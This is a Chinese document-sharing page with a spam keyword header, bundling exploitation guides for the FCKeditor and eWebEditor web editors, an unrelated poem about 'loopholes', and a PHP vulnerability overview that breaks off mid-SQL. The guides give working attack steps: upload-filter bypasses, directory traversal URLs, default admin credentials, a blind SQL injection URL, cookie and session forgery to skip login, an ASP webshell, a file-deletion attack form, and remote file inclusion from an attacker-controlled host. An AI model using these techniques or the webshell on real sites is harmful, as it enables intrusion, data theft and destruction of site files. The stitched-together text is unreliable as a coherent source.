欧美色欧美亚洲高清在线观看,国产特黄特色a级在线视频,国产一区视频一区欧美,亚洲成a 人在线观看中文

  1. <ul id="fwlom"></ul>

    <object id="fwlom"></object>

    <span id="fwlom"></span><dfn id="fwlom"></dfn>

      <object id="fwlom"></object>

      Fckeditor漏洞利用總結(jié)(五篇范文)

      時(shí)間:2019-05-13 21:13:11下載本文作者:會(huì)員上傳
      簡(jiǎn)介:寫寫幫文庫小編為你整理了多篇相關(guān)的《Fckeditor漏洞利用總結(jié)》,但愿對(duì)你工作學(xué)習(xí)有幫助,當(dāng)然你在寫寫幫文庫還可以找到更多《Fckeditor漏洞利用總結(jié)》。

      第一篇:Fckeditor漏洞利用總結(jié)

      Fckeditor漏洞利用總結(jié)

      查看編輯器版本

      FCKeditor/_whatsnew.html

      —————————————————————————————————————————————————————————————

      2.Version 2.2 版本

      Apache+linux 環(huán)境下在上傳文件后面加個(gè).突破!測(cè)試通過。

      —————————————————————————————————————————————————————————————

      3.Version <=2.4.2 For php 在處理pHp 上傳的地方并未對(duì)Media 類型進(jìn)行上傳文件類型的控制,導(dǎo)致用戶上傳任意文件!將以下保存為html文件,修改action地址。

      action=“http://

      FCKeditor/editor/filemanager/upload/test.html

      FCKeditor/editor/filemanager/connectors/test.html

      FCKeditor/editor/filemanager/connectors/uploadtest.html

      —————————————————————————————————————————————————————————————

      7.常用上傳地址

      FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

      FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

      FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://004km.cn%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php(ver:2.6.3 測(cè)試通過)

      JSp 版:

      FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

      注意紅色部分修改為FCKeditor 實(shí)際使用的腳本語言,藍(lán)色部分可以自定義文

      件夾名稱也可以利用../..目錄遍歷,紫色部分為實(shí)際網(wǎng)站地址。

      —————————————————————————————————————————————————————————————

      8.其他上傳地址

      FCKeditor/_samples/default.html

      FCKeditor/_samples/asp/sample01.asp

      FCKeditor/_samples/asp/sample02.asp

      FCKeditor/_samples/asp/sample03.asp

      FCKeditor/_samples/asp/sample04.asp

      一般很多站點(diǎn)都已刪除_samples 目錄,可以試試。

      FCKeditor/editor/fckeditor.html 不可以上傳文件,可以點(diǎn)擊上傳圖片按鈕再選擇瀏覽服務(wù)器即可跳轉(zhuǎn)至可上傳文件頁。

      —————————————————————————————————————————————————————————————

      9.列目錄漏洞也可助找上傳地址

      Version 2.4.1 測(cè)試通過

      修改CurrentFolder 參數(shù)使用../../來進(jìn)入不同的目錄

      /browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

      根據(jù)返回的XML 信息可以查看網(wǎng)站所有的目錄。

      FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

      也可以直接瀏覽盤符:

      JSp 版本:

      FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

      —————————————————————————————————————————————————————————————

      10.爆路徑漏洞

      FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

      —————————————————————————————————————————————————————————————

      11.FCKeditor 被動(dòng)限制策略所導(dǎo)致的過濾不嚴(yán)問題

      影響版本: FCKeditor x.x <= FCKeditor v2.4.3脆弱描述:

      FCKeditor v2.4.3 中File 類別默認(rèn)拒絕上傳類型:

      html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

      Fckeditor 2.0 <= 2.2 允許上傳asa、cer、php2、php4、inc、pwml、pht 后綴的文件上傳后它保存的文件直接用的$sFilepath = $sServerDir.$sFileName,而沒有使用$sExtension 為后綴.直接導(dǎo)致在win 下在上傳文件后面加個(gè).來突破[未測(cè)試]!

      而在apache 下,因?yàn)椤盇pache 文件名解析缺陷漏洞"也可以利用之,另建議其他上傳漏洞中定義TYpE 變量時(shí)使用File 類別來上傳文件,根據(jù)FCKeditor 的代碼,其限制最為狹隘。

      在上傳時(shí)遇見可直接上傳腳本文件固然很好,但有些版本可能無法直接上傳可以利用在文件名后面加.點(diǎn)或空格繞過,也可以利用2003 解析漏洞建立xxx.asp文件夾或者上傳xx.asp;.jpg!

      —————————————————————————————————————————————————————————————

      12.最古老的漏洞,Type文件沒有限制!

      我接觸到的第一個(gè)fckeditor漏洞了。版本不詳,應(yīng)該很古老了,因?yàn)槌绦驅(qū)ype=xxx 的類型沒有檢查。我們可以直接構(gòu)造上傳把type=Image 改成Type=hsren 這樣就可以建立一個(gè)叫hsren的文件夾,一個(gè)新類型,沒有任何限制,可以上傳任意腳本!

      —————————————————————————————————————————————————————————————

      以上方法都是網(wǎng)上收集和在平時(shí)滲透中所總結(jié)的經(jīng)驗(yàn),可能有些有遺漏,當(dāng)再想起的時(shí)候再補(bǔ)充,也有自己沒發(fā)現(xiàn)的就要靠各位大俠分享學(xué)習(xí)了!

      第二篇:ewebeditor漏洞利用總結(jié)

      ewebeditor漏洞利用總結(jié)

      先從最基本的記錄起!通常入侵ewebeditor編輯器的步驟如下:

      1、首先訪問默認(rèn)管理頁看是否存在。

      默認(rèn)管理頁地址2.80以前為 ewebeditor/admin_login.asp 以后版本為admin/login.asp(各種語言的大家自己改后綴,本文就以asp來進(jìn)行說明,下面不再細(xì)說了!)

      2、默認(rèn)管理帳號(hào)密碼!

      默認(rèn)管理頁存在!我們就用帳號(hào)密碼登陸!默認(rèn)帳號(hào)密碼為: admin admin888!常用的密碼還有admin admin999 admin1 admin000 之類的。

      3、默認(rèn)數(shù)據(jù)庫地址。

      如果密碼不是默認(rèn)的。我們就訪問是不是默認(rèn)數(shù)據(jù)庫!嘗試下載數(shù)據(jù)庫得到管理員密碼!管理員的帳號(hào)密碼,都在eWebEditor_System表段里,sys_UserName Sys_Userpass 都是md5加密的。得到了加密密碼。可以去!修改紅色部分的路徑,然后自動(dòng)上傳.cer 文件!漏洞原因是因?yàn)閟StyleName變量直接從style中讀取,并沒有過濾,所以可以包含任意字符!用select在ewebeditor_style表中查找s_name為sStyleName的記錄,找不到就提示出錯(cuò)!在sStyleName變量中用union來構(gòu)造記錄,我們可以在sAllowExt中加入“|cer”、“|asa”等!

      另外還有一些版本的ewebeditor的upload.asp文件存在注入漏洞!貼幾個(gè)注入用的url!信息錯(cuò)誤則返回腳本出錯(cuò)的提示,在瀏覽器左下角!具體利用如下:

      ewebeditor/Upload.asp?type=FILE&style=standard_coolblue1'and%20(select%20top%201%20asc(mid(sys_userpass,15,1))%20from%20ewebeditor_system%20)>98%20and%20'1'='1

      注意修改紅色部分的字段名、位數(shù)、ascii碼的值!

      7、目錄遍歷漏洞!

      這里大概說一下!目錄遍歷漏洞基本存在于ewebeditor/admin_uploadfile.asp 高版本的是ewebeditor/admin/upload.asp 文件!這個(gè)文件有的不需要登陸驗(yàn)證,有些需要!很多有經(jīng)驗(yàn)的管理員會(huì)把編輯器的目錄設(shè)置為只讀權(quán)限,不可修改!這種情況下,唯一可以利用的也就是利用遍歷目錄功能查看網(wǎng)站文件,比如數(shù)據(jù)庫路徑、后臺(tái)地址、其他的上傳地址、最直觀的就是別人留下的小馬等等!這些都自由發(fā)揮了!說下漏洞利用方法!

      漏洞利用方式如下:在上傳文件管理頁面 隨便選擇一個(gè)上傳樣式!比如ewebeditor/admin_uploadfile.asp?id=14 在id后面添加&dir=../..類似如下:webeditor/admin_uploadfile.asp?id=14&dir=../../../../data/ 可以看到網(wǎng)站數(shù)據(jù)庫的路徑!

      另外一個(gè)遍歷目錄的漏洞文件是 ewebeditor/asp/browse.asp

      漏洞代碼為 :

      Function GetList()

      Dim s_List, s_Url

      s_List = “"

      Dim oFSO, oUploadFolder, oUploadFiles, oUploadFile, sFileName

      'Response.Write sCurrDir

      'On Error Resume Next

      Set oFSO = Server.CreateObject(”Scripting.FileSystemObject“)

      Set oUploadFolder = oFSO.GetFolder(Server.Mappath(sCurrDir))

      '注意一下sCurrDir變量,這個(gè)值等下我們可以用到

      If Err.Number>0 Then

      s_List = ”“

      Exit Function

      End If

      If sDir <> ”“ Then

      If InstrRev(sDir, ”/“)> 1 Then

      s_Url= Left(sDir, InstrRev(sDir, ”/“)-1)

      Else

      s_Url = ”“

      End If

      s_List = s_List & ”“ & _

      ”“ & _

      ”..“ & _

      ” “ & _

      ”“

      End If

      'Response.Write sDir&”!“&s_List

      Dim oSubFolder

      For Each oSubFolder In oUploadFolder.SubFolders

      'Response.Write oUploadFolder.SubFolders

      If sDir = ”“ Then

      s_Url = oSubFolder.Name

      Else

      s_Url = sDir & ”/“ & oSubFolder.Name

      End If

      s_List = s_List & ”“ & _

      ”“ & _

      ”“ & oSubFolder.Name & ”“ & _

      ” “ & _

      ”“

      Next

      'Response.Write s_List

      Set oUploadFiles = oUploadFolder.Files

      For Each oUploadFile In oUploadFiles

      'Response.Write oUploadFile.Name

      sFileName = oUploadFile.Name

      If CheckValidExt(sFileName)= True Then

      '這行讓人有點(diǎn)郁悶,檢測(cè)了所有允許的文件后綴,如不允許就無法列出,不然就不只列出目錄名和圖片文件了

      If sDir = ”“ Then

      s_Url = sContentpath & sFileName

      Else

      s_Url = sContentpath & sDir & ”/“ & sFileName

      End If

      s_List = s_List & ”“ & _

      ”“ & FileName2pic(sFileName)& ”“ & _

      ”“ & sFileName & ”“ & _

      ”“ & GetSizeUnit(oUploadFile.size)& ”“ & _

      ”“

      End If

      Next

      Set oUploadFolder = Nothing

      Set oUploadFiles = Nothing

      'Response.Write Server.HTMLEncode(s_List)&”!“&s_Url

      If sDir = ”“ Then

      s_Url = ”“

      's_Url = ”/“

      Else

      s_Url = ”/“ & sDir & ”“

      's_Url = ”/“ & sDir & ”/“

      End If

      s_List = s_List & ”“

      s_List = HTML2JS(s_List)

      'Response.Write Server.HTMLEncode(s_List)&”!“&s_Url

      s_List = ”parent.setDirList(“"” & s_List & “"”, “"” & s_Url & “"”)“

      GetList = s_List

      End Function

      '如果沒有下面這步檢測(cè)的話,應(yīng)該就可以列出目錄中所有的文件了,有點(diǎn)郁悶..現(xiàn)在只能列出允許后綴的文件和目錄名

      Function CheckValidExt(s_FileName)

      If sAllowExt = ”“ Then

      CheckValidExt = True

      Exit Function

      End If

      Dim i, aExt, sExt

      sExt = LCase(Mid(s_FileName, InStrRev(s_FileName, ”.“)+ 1))

      CheckValidExt = False

      aExt = Split(LCase(sAllowExt), ”|“)

      For i = 0 To UBound(aExt)

      If aExt(i)= sExt Then

      CheckValidExt = True

      Exit Function

      End If

      Next

      End Function

      '我們順著代碼往下找,發(fā)現(xiàn)sCurrDir的值是通過下面的值得到的

      Sub Initparam()

      sType = UCase(Trim(Request.QueryString(”type“)))

      sStyleName = Trim(Request.QueryString(”style“))

      Dim i, aStyleConfig, bValidStyle

      bValidStyle = False

      For i = 1 To Ubound(aStyle)

      aStyleConfig = Split(aStyle(i), ”|||“)

      If Lcase(sStyleName)= Lcase(aStyleConfig(0))Then

      bValidStyle = True

      Exit For

      End If

      Next

      If bValidStyle = False Then

      OutScript(”alert('Invalid Style.')“)

      End If

      sBaseUrl = aStyleConfig(19)

      'nAllowBrowse = CLng(aStyleConfig(43))

      nAllowBrowse =

      1If nAllowBrowse <> 1 Then

      OutScript(”alert('Do not allow browse!')“)

      End If

      sUploadDir = aStyleConfig(3)

      If Left(sUploadDir, 1)<> ”/“ Then

      Select Case sType

      Case ”REMOTE“

      sUploadDir = ”../../“ & sUploadDir & ”Image/“

      Case ”FILE“

      sUploadDir = ”../../“ & sUploadDir & ”O(jiān)ther/“

      Case ”MEDIA“

      sUploadDir = ”../../“ & sUploadDir & ”Media/“

      Case ”FLASH“

      sUploadDir = ”../../“ & sUploadDir & ”Flash/“

      Case Else

      sUploadDir = ”../../“ & sUploadDir & ”Image/“

      End Select

      End If

      'sUploadDir =sUploadDir &”/“

      Select Case sBaseUrl

      Case ”0“

      'sContentpath = aStyleConfig(23)

      Select Case sType

      Case ”REMOTE“

      sContentpath = ”../“ & aStyleConfig(3)& ”Image/“

      Case ”FILE“

      sContentpath = ”../“ & aStyleConfig(3)& ”O(jiān)ther/“

      Case ”MEDIA“

      sContentpath = ”../“ & aStyleConfig(3)& ”Media/“

      Case ”FLASH“

      sContentpath = ”../“ & aStyleConfig(3)& ”Flash/“

      Case Else

      sContentpath = ”../“ & aStyleConfig(3)& ”Image/“

      End Select

      Case ”1“

      sContentpath = Relativepath2Rootpath(sUploadDir)

      Case ”2“

      sContentpath = Rootpath2Domainpath(Relativepath2Rootpath(sUploadDir))

      End Select

      Select Case sType

      Case ”REMOTE“

      sAllowExt = aStyleConfig(10)

      Case ”FILE“

      sAllowExt = aStyleConfig(6)

      Case ”MEDIA“

      sAllowExt = aStyleConfig(9)

      Case ”FLASH“

      sAllowExt = aStyleConfig(7)

      Case Else

      sAllowExt = aStyleConfig(8)

      End Select

      sCurrDir = sUploadDir '注意這里,這個(gè)是得到了配置的路徑地址

      sDir = Trim(Request(”dir“))'得到dir變量

      sDir = Replace(sDir, ”“, ”/“)'對(duì)dir變量進(jìn)行過濾

      sDir = Replace(sDir, ”../“, ”“)

      sDir = Replace(sDir, ”./“, ”“)

      If sDir <> ”“ Then

      If CheckValidDir(Server.Mappath(sUploadDir & sDir))= True Then

      sCurrDir = sUploadDir & sDir & ”/“

      '重點(diǎn)就在這里了,看到?jīng)]有,當(dāng)sUploadDir & sDir存在的時(shí)候,sCurrDir就為sUploadDir & sDir的值了

      '雖然上面對(duì)sDir進(jìn)行了過濾,不過我們完全可以跳過.具體利用下面的利用中給出

      Else

      sDir = ”“

      End If

      End If

      End Sub

      利用方式如下:

      http://site/ewebeditor/asp/browse.asp?style=standard650&dir=…././/…././/admin

      這樣子就可以看到admin的內(nèi)容了。構(gòu)造特殊的dir繞過上面的驗(yàn)證!頁面空白的時(shí)候查看源代碼,就可以看到目錄列表了!

      8、session欺騙漏洞!

      適用于一些設(shè)置不當(dāng)?shù)奶摂M主機(jī)。當(dāng)旁注得到一個(gè)webshell,而目標(biāo)站存在ewebeditor卻不能找到密碼的時(shí)候可以嘗試欺騙進(jìn)入后臺(tái)!順序如下:

      新建一個(gè).asp文件,內(nèi)容如下: <%Session(”eWebEditor_User“)= ”123132323“%> 然后訪問這個(gè)文件,再訪問ewebeditor/admin_default.asp!欺騙進(jìn)入后臺(tái)!不過很老了!

      9、后臺(tái)跳過認(rèn)證漏洞!

      訪問后臺(tái)登陸頁面!隨便輸入帳號(hào)密碼,返回錯(cuò)誤!然后清空瀏覽器,在地址欄輸入

      javascript:alert(document.cookie=”adminuser=“+escape(”admin“));

      javascript:alert(document.cookie=”adminpass=“+escape(”admin“));

      javascript:alert(document.cookie=”admindj=“+escape(”1“));

      然后再清空地址欄,在路徑里輸入后臺(tái)登陸后的頁面,比如: admin_default.asp admin/default.asp 等。直接進(jìn)入后臺(tái),利用方式見上文!

      10、利用遠(yuǎn)程上傳功能!

      比如s_full樣式就存在這個(gè)功能,打開編輯頁面,然后圖片,選擇輸入url 比如:http://site.com/1.gif.asp!然后選擇上傳遠(yuǎn)程文件!自動(dòng)就把1.gif.asp 保存在上傳目錄內(nèi)!注:網(wǎng)上的東西大部分傳來傳去,這個(gè)辦法愚弄自己還成!文件的確顯示后綴為.asp 但是不能訪問,因?yàn)槭占^來的時(shí)候自動(dòng)截止在1.gif了所以后面的.asp等于沒有!而且gif的內(nèi)容就是我們這個(gè)url的路徑!呵呵,后來又看到一個(gè)利用方式!是利用遠(yuǎn)程搜集的時(shí)候執(zhí)行,我們文件的代碼生成另外的小馬!

      利用代碼如下:

      首先建立1.gif.asp 代碼如下

      <%

      Set fs = CreateObject(”Scripting.FileSystemObject“)

      Set MyTextStream=fs.OpenTextFile(server.Mappath(”akteam.asp“),1,false,0)

      Thetext=MyTextStream.ReadAll

      response.write thetext

      %>

      在我們的1.gif.asp的同目錄下建立一個(gè)akteam.asp文件,內(nèi)容就是我們的小馬:

      <%on error resume next%>

      <%ofso=”scripting.filesystemobject“%>

      <%set fso=server.createobject(ofso)%>

      <%path=request(”path“)%>

      <%if path<>”“ then%>

      <%data=request(”dama“)%>

      <%set dama=fso.createtextfile(path,true)%>

      <%dama.write data%>

      <%if err=0 then%>

      <%=”success“%>

      <%else%>

      <%=”false“%>

      <%end if%>

      <%err.clear%>

      <%end if%>

      <%dama.close%>

      <%set dama=nothing%>

      <%set fos=nothing%>

      <%=”“%>

      <%=”“%>

      <%=”
      “%>

      <%=server.mappath(request.servervariables(”script_name“))%>

      <%=”
      “%>

      <%=”“%>

      <%=”“%>

      <%=”
      “%>

      <%=”“%>

      <%=”

      “%>

      利用上面說的遠(yuǎn)程上傳的方式!可以得到webshell!成功率取決于,虛擬主機(jī)的安全設(shè)置!

      11、任意文件刪除漏洞!

      此漏洞存在于ExampleNewsSystem目錄下的delete.asp文件中,這是ewebeditor的測(cè)試頁面,無須登陸可以直接進(jìn)入!看代碼

      ' 把帶”|“的字符串轉(zhuǎn)為數(shù)組

      Dim aSavepathFileName

      aSavepathFileName = Split(sSavepathFileName, ”|“)

      ' 刪除新聞相關(guān)的文件,從文件夾中

      Dim i

      For i = 0 To UBound(aSavepathFileName)

      ' 按路徑文件名刪除文件

      Call DoDelFile(aSavepathFileName(i))

      Next

      而aSavepathFileName是前面從數(shù)據(jù)庫取出來的:

      sSavepathFileName = oRs(”D_SavepathFileName“)

      看看D_SavepathFileName是怎么添加到數(shù)據(jù)庫里的,在addsave.asp(modifysave.asp)里:sSavepathFileName = GetSafeStr(Request.Form(”d_savepathfilename“))

      ...oRs(”D_SavepathFileName“)= sSavepathFileName

      居然過濾了,是GetSafeStr函數(shù),再看看這個(gè)函數(shù),在Startup.asp里:

      Function GetSafeStr(str)

      GetSafeStr = Replace(Replace(Replace(Trim(str), ”'“, ”“), Chr(34), ”“), ”;“, ”“)

      End Function

      既然路徑?jīng)]有過濾,那就可以直接定義了,構(gòu)造一個(gè)提交頁面,其中d_savepathfilename自己任意賦值(要?jiǎng)h除多個(gè)文件,用|隔開即可)。試試../../eWebEditor.asp,提交后刪除該新聞,于是主目錄下的eWebEditor.asp不見了!漏洞利用:

      eWebEditor刪除文件 byldjun(></p><p>新聞列表%20|%20增加新聞</p><p>增加新聞</p><p>http://127.0.0.1/editor/Example/NewsSystem/addsave.asp”</p><p>method=“post” name=“myform”></p><p><input type=hidden name=d_originalfilename></p><p><input type=hidden name=d_savefilename></p><p><table cellspacing=3 align=center></p><p><tr><td>要?jiǎng)h的文件(相對(duì)路徑就可以了):</td></p><p><td><input type=“text” name=“d_savepathfilename” value=“" size=”90“></td></p><p></tr></p><p><tr><td>新聞標(biāo)題(隨便填):</td></p><p><td><input type=”text“ name=”d_title“ value=”“ size=”90“></td></p><p></tr></p><p><tr><td>標(biāo)題圖片:</td></p><p><td><select name=”d_picture“ size=1><option value=''>無</option></select></p><p>當(dāng)編輯區(qū)有插入圖片時(shí),將自動(dòng)填充此下拉框</td></p><p></tr></p><p><tr><td>新聞內(nèi)容(隨便填):</td></p><p><td><textarea name=”d_content“></textarea></td></p><p></tr></p><p></table></p><p><input type=submit name=btnSubmit value=” 提 交 “></p><p><input type=reset name=btnReset value=” 重 填 “></p><p></form></p><p></BODY></HTML></p><p>刪除文件漏洞一般是配合其他漏洞使用的,比如目錄遍歷</p><p><a href='list.asp'>中的list.asp地址要修改</p><p><a href='add.asp'>中的add.asp地址要修改</p><p><form action=”http://127.0.0.1/editor/Example/NewsSystem/addsave.asp“</p><p>(http://127.0.0.1/editor/Example/NewsSystem/addsave.asp地址要修改)</p><p>另外一個(gè)簡(jiǎn)單利用方式:</p><p><form action=”http://004km.cn/editor/example/newssystem/addsave.asp“ method=”post“></p><p><input type=hidden name=d_originalfilename value=”x“></p><p><input type=hidden name=d_savefilename value=”x“></p><p>要?jiǎng)h除的文件(相對(duì)路徑,多個(gè)文件用“|”隔開)<br></p><p><input type=text name=d_savepathfilename></p><p><input type=hidden name=”d_title“ value=”x“></p><p><input type=hidden name=”d_picture“ value=”x“></p><p><textarea name=”d_content“>x</textarea></p><p><input type=submit name=btnSubmit value=”submit"></p><p></form></p><p>然后得到返回的新聞ID再提交:http://004km.cn/editor/example/newssystem/delete.asp?id=[id]</p><p>有幾個(gè)版本的ewebeditor 上傳類型是在 security.asp 文件控制的!直接刪除該文件可以上傳任意webshell!</p><p>12、其他!</p><p>其他說點(diǎn)什么呢!以上的辦法都是本人經(jīng)驗(yàn)和網(wǎng)上搜集!暫時(shí)就想到這些了,以后想到了再補(bǔ)全!說說aspx php jsp版本的利用吧!</p><p>ASpX版:</p><p>受影響文件:eWebEditorNet/upload.aspx</p><p>利用方法:添好本地的cer的Shell文件。在瀏覽器地址欄輸入javascript:lbtnUpload.click();就能得到shell。嘿嘿....繞過了限制......成功的上傳了ASpX文件....文件默認(rèn)的上傳后保存的地址是eWebEditorNet/UploadFile/現(xiàn)在來看看是否上傳成功.....pHp版本:php版本和asp版本利用方式類似!不過php權(quán)限較高,不多廢話了!</p><p>jsp版本:網(wǎng)上有很多jsp的版本,根本沒有對(duì)上傳文件類型進(jìn)行檢測(cè)!需要注意的是jsp版本的沒有上傳按鈕!直接選擇文件,回車就可以提交了!</p><h2><a name="3" >第三篇:漏洞現(xiàn)代詩歌</a></h2><p>閃電把漆黑的天幕<p>撕開一條漏洞</p><p>瞬間照亮了前方的路</p><p>雷響了,雨來了</p><p>淹沒了蟬鳴,蛙聲</p><p>我仍然站在暴雨中</p><p>是期待還是等待</p><p>沒有什么目標(biāo)</p><p>只有讓閃電照耀</p><p>讓暴雨洗滌沾滿身驅(qū)的污垢</p><p>和疲憊不堪的肢體</p><p>我也記不清閃電劃過多少次</p><p>雷聲響過多少回</p><p>就好象數(shù)不清這生</p><p>有多少個(gè)漏洞</p><p>又失去多少個(gè)</p><p>可以擁有的機(jī)遇</p><p>上千個(gè)電話號(hào)碼</p><p>有幾個(gè)在你危難時(shí)</p><p>可以伸手相助</p><p>多少人鞍前馬后</p><p>有幾個(gè)能和你走到最后</p><p>春暖花開還訴說著情深似海</p><p>冬天一到便無影無蹤</p><p>也許上蒼給予這些眷顧</p><p>是你生命中注定的磨難</p><p>只能在這時(shí)才清醒</p><p>被雨澆透的輕松</p><p>總是在糾結(jié)過去了的往事</p><p>一個(gè)丟失</p><p>就成為一個(gè)漏洞</p><p>一個(gè)失敗</p><p>就鑄成終身憾事</p><p>用時(shí)間填補(bǔ)那些漏洞</p><p>用生命去等待</p><p>另一道閃電</p><p>照亮百孔千瘡的靈魂</p><p>這時(shí)才感到命運(yùn)中的頑強(qiáng)</p><p>是彌補(bǔ)這些漏洞的良藥</p><p>在暴風(fēng)雨中沖刷</p><p>在等待中找準(zhǔn)方向</p><p>迎接一個(gè)嶄新的未來</p><h2><a name="4" >第四篇:PHP網(wǎng)站漏洞的相關(guān)總結(jié)</a></h2><p>PHP網(wǎng)站漏洞的相關(guān)總結(jié)</p><p>NB聯(lián)盟-zwell 從現(xiàn)在的網(wǎng)絡(luò)安全來看,大家最關(guān)注和接觸最多的WEB頁面漏洞應(yīng)該是ASP了,在這方面,小竹是專家,我沒發(fā)言權(quán).然而在PHP方面來看,也同樣存在很嚴(yán)重的安全問題,但是這方面的文章卻不多.在這里,就跟大家來稍微的討論一下PHP頁面的相關(guān)漏洞吧.我對(duì)目前常見的PHP漏洞做了一下總結(jié),大致分為以下幾種:包含文件漏洞,腳本命令執(zhí)行漏洞,文件泄露漏洞,SQL注入漏洞等幾種.當(dāng)然,至于COOKIE欺騙等一部分通用的技術(shù)就不在這里討論了,這些資料網(wǎng)上也很多.那么,我們就一個(gè)一個(gè)來分析一下怎樣利用這些漏洞吧!首先,我們來討論包含文件漏洞.這個(gè)漏洞應(yīng)該說是PHP獨(dú)有的吧.這是由于不充分處理外部提供的惡意數(shù)據(jù),從而導(dǎo)致遠(yuǎn)程攻擊者可以利用這些漏洞以WEB進(jìn)程權(quán)限在系統(tǒng)上執(zhí)行任意命令.我們來看一個(gè)例子:假設(shè)在a.php中有這樣一句代碼: <?php include($include.“/xxx.php”);?> 在這段代碼中,$include一般是一個(gè)已經(jīng)設(shè)置好的路徑,但是我們可以通過自己構(gòu)造一個(gè)路徑來達(dá)到攻擊的目的.比方說我們提交:a.php?include=http://web/b.php,這個(gè)web是我們用做攻擊的空間,當(dāng)然,b.php也就是我們用來攻擊的代碼了.我們可以在b.php中寫入類似于:passthru(“/bin/ls /etc”);的代碼.這樣,就可以執(zhí)行一些有目的的攻擊了.(注:web服務(wù)器應(yīng)該不能執(zhí)行php代碼,不然就出問題了.相關(guān)詳情可以去看<<如何對(duì)PHP程序中的常見漏洞進(jìn)行攻擊>>).在這個(gè)漏洞方面,出狀況的很多,比方說:PayPal Store Front, HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.接著,我們?cè)賮砜匆幌履_本命令執(zhí)行漏洞.這是由于對(duì)用戶提交的URI參數(shù)缺少充分過濾,提交包含惡意HTML代碼的數(shù)據(jù),可導(dǎo)致觸發(fā)跨站腳本攻擊,可能獲得目標(biāo)用戶的敏感信息。我們也舉個(gè)例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php頁面對(duì)PHPSESSID缺少充分的過濾,我們可以通過這樣的代碼來達(dá)到攻擊的目的: http://web/index.php?PHPSESSID=“>在script里面我們可以構(gòu)造函數(shù)來獲得用戶的一些敏感信息.在這個(gè)漏洞方面相對(duì)要少一點(diǎn),除了PHP Transparent之外還有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等.再然后,我們就來看看文件泄露漏洞了.這種漏洞是由于對(duì)用戶提交參數(shù)缺少充分過濾,遠(yuǎn)程攻擊者可以利用它進(jìn)行目錄遍歷攻擊以及獲取一些敏感信息。我們拿最近發(fā)現(xiàn)的phpMyAdmin來做例子.在phpMyAdmin中,export.php頁面沒有對(duì)偉創(chuàng)電腦維修用戶提交的'what'參數(shù)進(jìn)行充分過濾,遠(yuǎn)程攻擊者提交包含多個(gè)'../'字符的數(shù)據(jù),便可繞過WEB ROOT限制,以WEB權(quán)限查看系統(tǒng)上的任意文件信息。比方說打入這樣一個(gè)地址:export.php?what=../../../../../../etc/passwd%00 就可以達(dá)到文件泄露的目的了.在這方面相對(duì)多一點(diǎn),有:myPHPNuke,McNews等等.最后,我們又要回到最興奮的地方了.想想我們平時(shí)在asp頁面中用SQL注入有多么爽,以前還要手動(dòng)注入,一直到小竹悟出”SQL注入密笈“(嘿嘿),然后再開做出NBSI以后,我們NB聯(lián)盟真是拉出一片天空.曾先后幫CSDN,大富翁論壇,中國(guó)頻道等大型網(wǎng)站找出漏洞.(這些廢話不多說了,有點(diǎn)跑題了...).還是言規(guī)正傳,其實(shí)在asp中SQL的注入和php中的SQL注入大致相同,只不過稍微注意一下用的幾個(gè)函數(shù)就好了.將asc改成ASCII,len改成LENGTH,其他函數(shù)基本不變了.其實(shí)大家看到PHP的SQL注入,是不是都會(huì)想到PHP-NUKE和PHPBB呢?不錯(cuò),俗話說樹大招分,像動(dòng)網(wǎng)這樣的論壇在asp界就該是漏洞這王了,這并不是說它的論壇安全太差,而是名氣太響,別人用的多了,研究的人也就多了,發(fā)現(xiàn)的安全漏洞也就越多了.PHPBB也是一樣的,現(xiàn)在很大一部分人用PHP做論壇的話,一般都是選擇了PHPBB.它的漏桂林偉創(chuàng)電腦洞也是一直在出,從最早phpBB.com phpBB 1.4.0版本被人發(fā)現(xiàn)漏洞,到現(xiàn)在最近的phpBB 2.0.6版本的groupcp.php,以及之前發(fā)現(xiàn)的search.php,profile.php,viewtopic.php等等加起來,大概也有十來個(gè)樣子吧.這也一直導(dǎo)致,一部分人在研究php漏洞的時(shí)候都會(huì)拿它做實(shí)驗(yàn)品,所謂百練成精嘛,相信以后的PHPBB會(huì)越來越好.好了,我們還是來分析一下漏洞產(chǎn)生的原因吧.拿viewtopic.php頁面來說,由于在調(diào)用viewtopic.php時(shí),直接從GET請(qǐng)求中獲得”topic_id“并傳遞給SQL查詢命令,而并沒有進(jìn)行一些過濾的處理,攻擊者可以提交特殊的SQL字符串用于獲得MD5密碼,獲得此密碼信息可以用于自動(dòng)登錄或者進(jìn)行暴力破解。(我想應(yīng)該不會(huì)有人想去暴力破解吧,除非有特別重要的原因).先看一下相關(guān)源代碼: # if(isset($HTTP_GET_VARS[POST_TOPIC_URL]))# { # $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);# } # else if(isset($HTTP_GET_VARS['topic']))# { # $topic_id = intval($HTTP_GET_VARS['topic']);# } 從上面我們可以看出,如果提交的view=newest并且sid設(shè)置了值的話,執(zhí)行的查詢代碼像下面的這個(gè)樣子(如果你還沒看過PHPBB源代碼的話,建議你看了再對(duì)著這里來看,受影響系統(tǒng)為:phpBB 2.0.5和phpBB 2.0.4).# $sql = ”SELECT p.post_id # FROM “.POSTS_TABLE.” p, “.SESSIONS_TABLE.” s, “.USERS_TABLE.” u # WHERE s.session_id = '$session_id' # AND u.user_id = s.session_user_id # AND p.topic_id = $topic_id # AND p.post_time >= u.user_lastvisit # ORDER BY p.post_time ASC # LIMIT 